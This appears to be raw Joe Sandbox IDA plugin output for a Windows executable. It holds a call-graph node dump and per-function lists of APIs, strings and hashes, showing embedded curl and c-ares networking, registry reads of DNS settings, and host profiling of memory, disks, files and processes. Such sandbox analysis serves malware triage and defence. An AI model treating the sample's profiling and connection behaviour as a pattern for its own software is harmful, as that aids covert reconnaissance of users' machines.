80665->80672 80667->80649 80668->80650 80669->80646 80670->80663 80671->80665 80672->80663 80673 460700 80686 46099d 80673->80686 80687 460719 80673->80687 80675 427310 _open 80675->80687 80676 4609b5 80676->80686 80697 4650a0 _open 80676->80697 80677 4609f6 80698 4275a0 80677->80698 80680 460a35 80702 464f40 _open 80680->80702 80687->80675 80687->80676 80687->80677 80687->80680 80687->80686 80691 45b8e0 _open 80687->80691 80692 48f570 _open 80687->80692 80693 44eb30 _open 80687->80693 80694 4813a0 _open 80687->80694 80695 4a39a0 _open 80687->80695 80696 44eae0 _open 80687->80696 80689 4275a0 _open 80689->80686 80691->80687 80692->80687 80693->80687 80694->80687 80695->80687 80696->80687 80697->80686 80699 4275d1 80698->80699 80700 4275aa 80698->80700 80699->80689 80700->80699 80703 4272a0 _open 80700->80703 80702->80686 80703->80699 80704 8a6000 80705 8a6032 80704->80705 80706 8a603e 80705->80706 80709 7a8f70 80705->80709 80708 8a6047 80716 7a8e90 _open 80709->80716 80711 7a8f82 80712 7a8e90 _open 80711->80712 80713 7a8fa2 80712->80713 80714 7a8f70 _open 80713->80714 80715 7a8fb8 80714->80715 80715->80708 80717 7a8eba 80716->80717 80717->80711 80718 4213c9 80720 421160 80718->80720 80722 7a93e0 80720->80722 80732 8a61d0 80720->80732 80723 7a9400 80722->80723 80731 7a93f3 80722->80731 80724 7a9688 80723->80724 80725 7a96c7 80723->80725 80729 7a9220 vfprintf 80723->80729 80730 7a9280 vfprintf 80723->80730 80723->80731 80724->80725 80724->80731 80736 7a9280 vfprintf 80724->80736 80737 7a9220 vfprintf 80725->80737 80728 7a96df 80728->80720 80729->80723 80730->80723 80731->80720 80733 8a6202 80732->80733 80734 8a6353 80733->80734 80735 7a8f70 _open 80733->80735 80734->80720 80735->80733 80736->80724 80737->80728 80738 4d3c00 80739 4d3c23 80738->80739 80741 4d3c0d 80738->80741 80739->80741 80742 4eb180 80739->80742 80745 4eb19b 80742->80745 80749 4eb2e3 80742->80749 80746 4eb2a9 getsockname 80745->80746 80748 4eb020 closesocket 80745->80748 80745->80749 80750 4eaf30 
80745->80750 80754 4eb060 80745->80754 80759 4eb020 80746->80759 80748->80745 80749->80741 80751 4eaf4c 80750->80751 80752 4eaf63 socket 80750->80752 80751->80752 80753 4eaf52 80751->80753 80752->80745 80753->80745 80758 4eb080 80754->80758 80755 4eb0b0 connect 80756 4eb0bf WSAGetLastError 80755->80756 80757 4eb0ea 80756->80757 80756->80758 80757->80745 80758->80755 80758->80756 80758->80757 80760 4eb029 80759->80760 80761 4eb052 80759->80761 80762 4eb04b closesocket 80760->80762 80763 4eb03e 80760->80763 80761->80745 80762->80761 80763->80745 81081 4d4720 81085 4d4728 81081->81085 81082 4d4733 81084 4d4774 81085->81082 81092 4d476c 81085->81092 81093 4d5540 socket ioctlsocket connect getsockname closesocket 81085->81093 81087 4d482e 81087->81092 81094 4d9270 81087->81094 81089 4d4860 81099 4d4950 81089->81099 81091 4d4878 81092->81091 81105 4d30a0 socket ioctlsocket connect getsockname closesocket 81092->81105 81093->81087 81106 4da440 81094->81106 81096 4d92ab 81096->81089 81097 4d9297 81097->81096 81134 4dbbe0 socket ioctlsocket connect getsockname closesocket 81097->81134 81102 4d4966 81099->81102 81100 4d4aa0 gethostname 81101 4d49c5 81100->81101 81104 4d49b9 81100->81104 81101->81092 81102->81101 81102->81104 81135 4dbbe0 socket ioctlsocket connect getsockname closesocket 81102->81135 81104->81100 81104->81101 81105->81084 81132 4da46b 81106->81132 81107 4dad14 81107->81097 81108 4daa03 RegOpenKeyExA 81109 4daa27 RegQueryValueExA 81108->81109 81110 4dab70 RegOpenKeyExA 81108->81110 81111 4daacc RegQueryValueExA 81109->81111 81112 4daa71 81109->81112 81113 4dac34 RegOpenKeyExA 81110->81113 81131 4dab90 81110->81131 81115 4dab0e 81111->81115 81116 4dab66 RegCloseKey 81111->81116 81112->81111 81118 4daa85 RegQueryValueExA 81112->81118 81114 4dacf8 RegOpenKeyExA 81113->81114 81129 4dac54 81113->81129 81114->81107 81117 4dad56 RegEnumKeyExA 81114->81117 81115->81116 81122 4dab1e RegQueryValueExA 81115->81122 81116->81110 81117->81107 81119 4dad9b 81117->81119 
81121 4daab3 81118->81121 81120 4dae16 RegOpenKeyExA 81119->81120 81123 4daddf RegEnumKeyExA 81120->81123 81124 4dae34 RegQueryValueExA 81120->81124 81121->81111 81127 4dab4c 81122->81127 81123->81107 81123->81120 81125 4daf43 RegQueryValueExA 81124->81125 81133 4dadaa 81124->81133 81126 4db052 RegQueryValueExA 81125->81126 81125->81133 81128 4dadc7 RegCloseKey 81126->81128 81126->81133 81127->81116 81128->81123 81129->81114 81130 4dafa0 RegQueryValueExA 81130->81133 81131->81113 81132->81107 81132->81108 81133->81125 81133->81126 81133->81128 81133->81130 81134->81096 81135->81104 80764 4ea080 80767 4e9740 80764->80767 80766 4ea09b 80768 4e9780 80767->80768 80772 4e975d 80767->80772 80769 4e9925 RegOpenKeyExA 80768->80769 80768->80772 80770 4e995a RegQueryValueExA 80769->80770 80769->80772 80771 4e9986 RegCloseKey 80770->80771 80771->80772 80772->80766 81136 42f7b0 81140 42f7c3 81136->81140 81158 42f97a 81136->81158 81138 42f932 81163 45cd80 81138->81163 81140->81158 81159 430150 81140->81159 81141 42f987 81184 471390 81141->81184 81142 42f942 81142->81141 81144 471390 _open 81142->81144 81143 42f854 81143->81138 81143->81158 81188 42fec0 8 API calls 81143->81188 81144->81142 81148 471390 _open 81149 42f9a0 81148->81149 81150 471390 _open 81149->81150 81151 42f9ac 81150->81151 81152 42f9bb WSACloseEvent 81151->81152 81153 4275a0 _open 81152->81153 81154 42f9df 81153->81154 81155 4275a0 _open 81154->81155 81156 42fa12 81155->81156 81157 4275a0 _open 81156->81157 81157->81158 81160 430167 81159->81160 81162 4301c3 81160->81162 81189 4330d0 _open 81160->81189 81162->81143 81164 45d0f1 81163->81164 81171 45cd9a 81163->81171 81164->81142 81165 45d0e5 81166 471390 _open 81165->81166 81166->81164 81167 45d0b4 81197 43f6c0 8 API calls 81167->81197 81168 45ce6b 81173 45d064 81168->81173 81183 45cf4b 81168->81183 81191 45dc30 6 API calls 81168->81191 81171->81165 81171->81168 81190 45dc30 6 API calls 81171->81190 81173->81167 81196 45de00 6 API calls 81173->81196 81175 
45d016 81175->81173 81195 45de00 6 API calls 81175->81195 81178 45df30 _open 81178->81183 81179 45d018 81194 437380 _open 81179->81194 81180 436fa0 select 81180->81183 81183->81175 81183->81178 81183->81179 81183->81180 81192 45e130 6 API calls 81183->81192 81193 437380 _open 81183->81193 81185 42f98d 81184->81185 81187 47139d 81184->81187 81185->81148 81186 4275a0 _open 81186->81185 81187->81186 81188->81143 81189->81162 81190->81171 81191->81168 81192->81183 81193->81183 81194->81175 81195->81175 81196->81173 81197->81165 80773 458b50 80774 458b6b 80773->80774 80802 458be6 80773->80802 80775 458bf3 80774->80775 80776 458b8f 80774->80776 80774->80802 80806 45a550 80775->80806 80877 436e40 select 80776->80877 80780 458cd9 SleepEx getsockopt 80781 458d18 80780->80781 80786 458cb2 80781->80786 80787 458d43 80781->80787 80782 458e85 80788 458eae 80782->80788 80782->80802 80883 432a00 _open 80782->80883 80783 45a150 2 API calls 80794 458dff 80783->80794 80784 458c35 80865 45a150 80784->80865 80785 458c1f connect 80785->80784 80786->80782 80786->80783 80786->80802 80793 45a150 2 API calls 80787->80793 80788->80802 80884 4278b0 closesocket 80788->80884 80792 458bb5 80792->80802 80879 4650a0 _open 80792->80879 80793->80792 80794->80782 80881 43d090 _open 80794->80881 80795 458c8b 80798 458ba1 80795->80798 80799 458dc8 80795->80799 80798->80780 80798->80786 80798->80792 80880 45b100 _open 80799->80880 80800 458e67 80882 464fd0 _open 80800->80882 80807 45a575 80806->80807 80809 45a597 80807->80809 80888 4275e0 80807->80888 80833 45a6d9 80809->80833 80900 45ef30 80809->80900 80810 45a709 80814 4278b0 2 API calls 80810->80814 80821 45a713 80810->80821 80812 458bfc 80812->80784 80812->80785 80812->80786 80812->80802 80814->80821 80816 45a7e5 80820 45a811 setsockopt 80816->80820 80825 45a87c 80816->80825 80837 45a8ee 80816->80837 80818 45a641 80818->80816 80914 464fd0 _open 80818->80914 80820->80825 80829 45a83b 80820->80829 80821->80812 80913 4650a0 _open 80821->80913 80822 
45a69b 80910 43d090 _open 80822->80910 80825->80837 80917 45b1e0 _open 80825->80917 80826 45a6c9 80911 464f40 _open 80826->80911 80829->80825 80915 43d090 _open 80829->80915 80830 45af56 80832 45af5d 80830->80832 80830->80833 80832->80821 80836 45a150 2 API calls 80832->80836 80833->80810 80833->80821 80912 432a00 _open 80833->80912 80834 45a86d 80916 464fd0 _open 80834->80916 80836->80821 80837->80833 80838 45abb9 80837->80838 80840 45ae32 80837->80840 80841 45acb8 80837->80841 80848 45af33 80837->80848 80855 45abe1 80837->80855 80843 45ad45 80838->80843 80846 45ade6 80838->80846 80838->80855 80919 456be0 9 API calls 80838->80919 80839 45b056 80928 43d090 _open 80839->80928 80840->80838 80925 464fd0 _open 80840->80925 80841->80833 80841->80838 80850 45acdc 80841->80850 80842 45af03 80842->80848 80926 464fd0 _open 80842->80926 80843->80846 80847 45ad5f 80843->80847 80923 43d090 _open 80846->80923 80920 4720d0 _open 80847->80920 80909 4867e0 ioctlsocket 80848->80909 80918 43d090 _open 80850->80918 80854 45b07b 80929 464f40 _open 80854->80929 80855->80833 80855->80839 80855->80842 80927 464fd0 _open 80855->80927 80859 45ad01 80924 464f40 _open 80859->80924 80860 45ad7b 80864 45adb7 80860->80864 80921 464fd0 _open 80860->80921 80922 473030 _open 80864->80922 80866 458c4d 80865->80866 80867 45a15f 80865->80867 80866->80795 80878 4650a0 _open 80866->80878 80867->80866 80868 45a181 getsockname 80867->80868 80869 45a1f7 80868->80869 80870 45a1d0 80868->80870 80871 45ef30 _open 80869->80871 80936 43d090 _open 80870->80936 80875 45a20f 80871->80875 80873 45a1eb 80938 464f40 _open 80873->80938 80875->80866 80937 43d090 _open 80875->80937 80877->80798 80878->80795 80879->80802 80880->80786 80881->80800 80882->80782 80883->80788 80885 4278c5 80884->80885 80886 4278d7 80884->80886 80939 4272a0 _open 80885->80939 80886->80802 80889 427607 socket 80888->80889 80890 4275ef 80888->80890 80891 42762b 80889->80891 80892 42763a 80889->80892 80890->80889 80893 427643 80890->80893 80894 
427601 80890->80894 80930 4272a0 _open 80891->80930 80892->80809 80931 4272a0 _open 80893->80931 80894->80889 80897 427654 80932 42cb20 _open 80897->80932 80899 427674 80899->80809 80901 45ef47 80900->80901 80902 45efa8 80900->80902 80903 45ef81 80901->80903 80904 45ef4c 80901->80904 80908 45a63a 80902->80908 80935 42c960 _open 80902->80935 80934 483d10 _open 80903->80934 80904->80908 80933 483d10 _open 80904->80933 80908->80818 80908->80822 80909->80830 80910->80826 80911->80833 80912->80810 80913->80812 80914->80816 80915->80834 80916->80825 80917->80837 80918->80859 80919->80843 80920->80860 80921->80864 80922->80855 80923->80859 80924->80833 80925->80838 80926->80848 80927->80855 80928->80854 80929->80833 80930->80892 80931->80897 80932->80899 80933->80908 80934->80908 80935->80908 80936->80873 80937->80873 80938->80866 80939->80886 80940 422f17 80947 422f2c 80940->80947 80941 4231d3 80942 422fb3 RegOpenKeyExA 80942->80947 80943 42315c RegEnumKeyExA 80943->80947 80944 423046 RegOpenKeyExA 80945 423089 RegQueryValueExA 80944->80945 80944->80947 80946 42313b RegCloseKey 80945->80946 80945->80947 80946->80947 80947->80941 80947->80942 80947->80943 80947->80944 80947->80946 80948 4231d7 80949 4231f4 80948->80949 80950 423200 80949->80950 80951 4232dc CloseHandle 80949->80951 80951->80950 81198 4595b0 81199 4595fd 81198->81199 81200 4595c8 81198->81200 81200->81199 81201 45a150 2 API calls 81200->81201 81201->81199 81202 456ab0 81203 456ad5 81202->81203 81204 456bb4 81203->81204 81206 436fa0 select 81203->81206 81205 4d5ed0 7 API calls 81204->81205 81207 456ba9 81205->81207 81208 456b54 81206->81208 81208->81204 81208->81207 81209 456b5d 81208->81209 81209->81207 81211 4d5ed0 81209->81211 81214 4d5a50 81211->81214 81213 4d5ee5 81213->81209 81215 4d5a58 81214->81215 81221 4d5ea0 81214->81221 81216 4d5b50 81215->81216 81226 4d5a99 81215->81226 81227 4d5b88 81215->81227 81219 4d5b7a 81216->81219 81220 4d5eb4 81216->81220 81216->81227 81217 4d5e96 81247 4e9480 socket 
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                • Associated: 00000000.00000002.1424227343.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1424245644.0000000000B61000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1424245644.0000000000B63000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1424718261.0000000000B66000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1424735414.0000000000B68000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1424735414.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1424735414.0000000000E0C000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE0000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1424735414.0000000000EF7000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1425042232.0000000000EF8000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1425165243.00000000010B4000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1425184734.00000000010B6000.00000080.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                                • API String ID: 0-1590685507
                                                                • Opcode ID: 125e297275be68b9fa84193225cf95cf896bfbf7a5f08a4e843710a42963c73d
                                                                • Instruction ID: 9763a891c1c3f028634416c0ac1b72a69cbd67ad45a4b9664457f79b5cd1de15
                                                                • Opcode Fuzzy Hash: 125e297275be68b9fa84193225cf95cf896bfbf7a5f08a4e843710a42963c73d
                                                                • Instruction Fuzzy Hash: 13C2AF31A043449FD714CF29C484B6BB7E1BF84314F05866EEC989B352E779E989CB86

                                                                Control-flow Graph

                                                                APIs
                                                                • GetSystemInfo.KERNELBASE ref: 00422579
                                                                • GlobalMemoryStatusEx.KERNELBASE ref: 004225CC
                                                                • GetDriveTypeA.KERNELBASE ref: 00422647
                                                                • GetDiskFreeSpaceExA.KERNELBASE ref: 0042267E
                                                                • KiUserCallbackDispatcher.NTDLL ref: 004227E2
                                                                • FindFirstFileW.KERNELBASE ref: 004228F8
                                                                • FindNextFileW.KERNELBASE ref: 0042291F
                                                                Strings
                                                                Similarity
                                                                • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                                • String ID: ;%B$@$`
                                                                • API String ID: 3271271169-2679738426
                                                                • Opcode ID: e14376f769b922f9dd7d420cfc31b9164616d2ed6a1241dba1fe089fd8edd520
                                                                • Instruction ID: c147881d223654ce4b1a6a37a920054d87ae1fd9fb03358a1a4f3f7e0145a0fb
                                                                • Opcode Fuzzy Hash: e14376f769b922f9dd7d420cfc31b9164616d2ed6a1241dba1fe089fd8edd520
                                                                • Instruction Fuzzy Hash: E5D1B1B49043099FDB10EFA8D98569EBBF0FF49344F008969E898D7391E7749A84CF52

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                                • String ID: 0
                                                                • API String ID: 2406880114-4108050209
                                                                • Opcode ID: 574da96faefc9c090f4b408b69330b85d209656a9537e17804d7eaf43aa37368
                                                                • Instruction ID: fea8a8e9748031d6c6b53b395849ad995fbfda2f358965c2bcf838f6c8304c3d
                                                                • Opcode Fuzzy Hash: 574da96faefc9c090f4b408b69330b85d209656a9537e17804d7eaf43aa37368
                                                                • Instruction Fuzzy Hash: 33E11AB4905318DFCB50EF68D98569EBBF4EF48344F40886AE488DB391EB789945CF42

                                                                Control-flow Graph

                                                                APIs
                                                                • WSAEventSelect.WS2_32(?,?,?), ref: 00430711
                                                                • WSAEventSelect.WS2_32(?,?,00000000), ref: 004309DD
                                                                • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 004309FC
                                                                Strings
                                                                Similarity
                                                                • API ID: EventSelect$EnumEventsNetwork
                                                                • String ID: N=B$multi.c
                                                                • API String ID: 2170980988-1850152977
                                                                • Opcode ID: e1e38e78fc523266575555198964e14afccd8539772c1a8e12991c25adeb1d75
                                                                • Instruction ID: 8039cd8f81f3d5eb72ba98ad6482d0b4348223defb879be3a3e9b5d0ae31c739
                                                                • Opcode Fuzzy Hash: e1e38e78fc523266575555198964e14afccd8539772c1a8e12991c25adeb1d75
                                                                • Instruction Fuzzy Hash: BBD1F5716083059FE710DF64D891BABB7E9FF98308F04592EF88483241E778E949CB5A

                                                                Control-flow Graph

                                                                APIs
                                                                • getsockname.WS2_32(-00000020,-00000020,?), ref: 004EB2B7
                                                                Strings
                                                                Similarity
                                                                • API ID: getsockname
                                                                • String ID: ares__sortaddrinfo.c$cur != NULL
                                                                • API String ID: 3358416759-2430778319
                                                                • Opcode ID: 2b3c7abcbedc33c1dd2bb185df01cc00cce5ab1c1a663f8a6c3d01ae5a7563f6
                                                                • Instruction ID: 6c152fe2b4642ba25a54f4abc62ac8cbd4df7d782f4c9cc94fa0f4183d2114ba
                                                                • Opcode Fuzzy Hash: 2b3c7abcbedc33c1dd2bb185df01cc00cce5ab1c1a663f8a6c3d01ae5a7563f6
                                                                • Instruction Fuzzy Hash: 17C17C316043559FD718DF26C885A6B77E1EF88305F04896EE8898B3A1DB38ED45CBC5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                • Associated: 00000000.00000002.1424227343.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1424245644.0000000000B61000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1424245644.0000000000B63000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1424718261.0000000000B66000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1424735414.0000000000B68000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1424735414.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1424735414.0000000000E0C000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE0000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1424735414.0000000000EF7000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1425042232.0000000000EF8000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1425165243.00000000010B4000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1425184734.00000000010B6000.00000080.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bc846163994b287d6c2a7b0485343a360e16ea2097747928ce8dbdf6c41e2995
                                                                • Instruction ID: 966c7dafc52b3511e3459e0883ddbb9d32d4d9adcfe34234ec5587eeeba0f48b
                                                                • Opcode Fuzzy Hash: bc846163994b287d6c2a7b0485343a360e16ea2097747928ce8dbdf6c41e2995
                                                                • Instruction Fuzzy Hash: 0A91277160D3094BD7358A28C8C47BBB2E5EFC9360F14AB2EE8D9472D4EB789C41D685
                                                                APIs
                                                                • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,004D712E,?,?,?,00001001,00000000), ref: 004EA90D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: recvfrom
                                                                • String ID:
                                                                • API String ID: 846543921-0
                                                                • Opcode ID: 63dd6313ff6bcf6f36eaa9b57f65cb2da8058283dfb93c38d7a6091498b0f1da
                                                                • Instruction ID: 4cbe31723e3c21f94217d7093a12f8ca5252adbc0273b6f5b913954ca212ff65
                                                                • Opcode Fuzzy Hash: 63dd6313ff6bcf6f36eaa9b57f65cb2da8058283dfb93c38d7a6091498b0f1da
                                                                • Instruction Fuzzy Hash: 65F01DB5118348AFD2109E42DC88D6BBBEDEFC9754F05496DF958133119271AE11CAB2
                                                                APIs
                                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 004DAA19
                                                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 004DAA4C
                                                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 004DAA97
                                                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 004DAAE9
                                                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 004DAB30
                                                                • RegCloseKey.KERNELBASE(?), ref: 004DAB6A
                                                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 004DAB82
                                                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 004DAC46
                                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 004DAD0A
                                                                • RegEnumKeyExA.KERNELBASE ref: 004DAD8D
                                                                • RegCloseKey.KERNELBASE(?), ref: 004DADD9
                                                                • RegEnumKeyExA.KERNELBASE ref: 004DAE08
                                                                • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 004DAE2A
                                                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 004DAE54
                                                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 004DAF63
                                                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 004DAFB2
                                                                • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 004DB072
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: QueryValue$Open$CloseEnum
                                                                • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                                • API String ID: 4217438148-1047472027
                                                                • Opcode ID: 598e731e1bbb6d458df908e14c4fdacde285ff4f6460b708adf3b77b76d2dcee
                                                                • Instruction ID: 6de138747716866c6fe9dd1331c814f560ee411262f88c7b78495147b0dae73e
                                                                • Opcode Fuzzy Hash: 598e731e1bbb6d458df908e14c4fdacde285ff4f6460b708adf3b77b76d2dcee
                                                                • Instruction Fuzzy Hash: 6872EEB1604301ABE7209B24CC91B6BB7E8FF85740F14482EF98597391EB78E954CB97
                                                                APIs
                                                                • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0045A832
                                                                Strings
                                                                • @, xrefs: 0045AC42
                                                                • bind failed with errno %d: %s, xrefs: 0045B080
                                                                • @, xrefs: 0045A8F4
                                                                • cf-socket.c, xrefs: 0045A5CD, 0045A735
                                                                • Bind to local port %d failed, trying next, xrefs: 0045AFE5
                                                                • Local Interface %s is ip %s using address family %i, xrefs: 0045AE60
                                                                • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0045A6CE
                                                                • Local port: %hu, xrefs: 0045AF28
                                                                • cf_socket_open() -> %d, fd=%d, xrefs: 0045A796
                                                                • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0045AD0A
                                                                • Trying %s:%d..., xrefs: 0045A7C2, 0045A7DE
                                                                • Name '%s' family %i resolved to '%s' family %i, xrefs: 0045ADAC
                                                                • Could not set TCP_NODELAY: %s, xrefs: 0045A871
                                                                • Trying [%s]:%d..., xrefs: 0045A689
                                                                • Couldn't bind to '%s' with errno %d: %s, xrefs: 0045AE1F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: setsockopt
                                                                • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                                • API String ID: 3981526788-2373386790
                                                                • Opcode ID: eb9773b206132948b02404539ac1df4480f87d3f6ed0f8e79d6d5d2da541db6e
                                                                • Instruction ID: 03e52c36aa13339ee7becb8e5ec3fe8f7015e7babc84f4dbfc28b9e89af2c1fd
                                                                • Opcode Fuzzy Hash: eb9773b206132948b02404539ac1df4480f87d3f6ed0f8e79d6d5d2da541db6e
                                                                • Instruction Fuzzy Hash: 84620571504341ABE720CF14C846BABB7E5BF84305F044A1EFD8897292E779E859CB97

                                                                Control-flow Graph

                                                                APIs
                                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 004E9946
                                                                • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 004E9974
                                                                • RegCloseKey.KERNELBASE(?), ref: 004E998B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                                                • API String ID: 3677997916-615551945
                                                                • Opcode ID: 79ca15e46342b3ba6da07b2066d96c1c7e66a83276c096c8df3f9c3aa19f6d36
                                                                • Instruction ID: 0e757516288238e67cd9b3eb1675fc50d21775518f6f864b8aae02c9bf9970f5
                                                                • Opcode Fuzzy Hash: 79ca15e46342b3ba6da07b2066d96c1c7e66a83276c096c8df3f9c3aa19f6d36
                                                                • Instruction Fuzzy Hash: A632C6F5900241ABEB10AB27EC52A1B76D4AF50319F08443BF8499A393FB39ED14C75B

                                                                Control-flow Graph

                                                                • Function start: 458b50; blocks calling imported APIs: 458c1f-458c30 (connect), 458cd9-458d16 (SleepEx, getsockopt); graph image not reproduced
                                                                APIs
                                                                • connect.WS2_32(?,?,00000001), ref: 00458C30
                                                                • SleepEx.KERNELBASE(00000000,00000000), ref: 00458CF3
                                                                • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00458D0F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: Sleepconnectgetsockopt
